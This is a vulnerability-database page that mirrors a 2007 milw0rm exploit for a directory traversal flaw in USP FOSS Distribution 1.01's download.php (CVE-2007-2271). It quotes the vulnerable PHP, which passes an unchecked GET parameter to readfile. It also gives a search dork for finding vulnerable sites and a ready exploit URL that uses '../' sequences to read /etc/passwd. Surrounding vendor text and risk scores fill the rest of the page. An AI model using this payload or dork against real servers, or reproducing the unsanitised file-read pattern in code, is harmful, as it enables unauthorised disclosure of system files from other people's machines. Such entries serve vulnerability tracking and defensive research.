Lucene search
+L

USP FOSS Distribution 1.01 - 'dnld' Remote File Disclosure

🗓️ 24 Apr 2007 00:00:00Reported by GoLd_MType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

USP FOSS Distribution download.php Remote File Disclosur

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-2271
25 Apr 200720:00
cve
cvelist
Cvelist
CVE-2007-2271
25 Apr 200720:00
cvelist
euvd
EUVD
EUVD-2007-2266
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-2271
25 Apr 200720:19
nvd
prion
Prion
Directory traversal
25 Apr 200720:19
prion
# USP FOSS Distribution 1.01(download.php dnld)Remote File Disclosure
# D.Script: http://norcalvex.org/pagode/uspfoss_v1_01.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Dork:intitle:USP FOSS Distribution
# V.Code In /user/download.php:
###################/user/download.php###################
#  <?
#  $file = @$_GET['dnld'];<----[+]
#  header('Content-Description: File Transfer');
#  header('Content-Type: application/force-download');
#  header('Content-Length: ' . filesize($file));
#  header('Content-Disposition: attachment; filename=' . basename($file));
#  readfile($file); <----[+]
#  ?>
########################################################
# Exploit:[Path_USP FOSS]/user/download.php?dnld=../../../../../../etc/passwd
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & bd0rk

# milw0rm.com [2007-04-24]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Apr 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.4
EPSS0.08429
37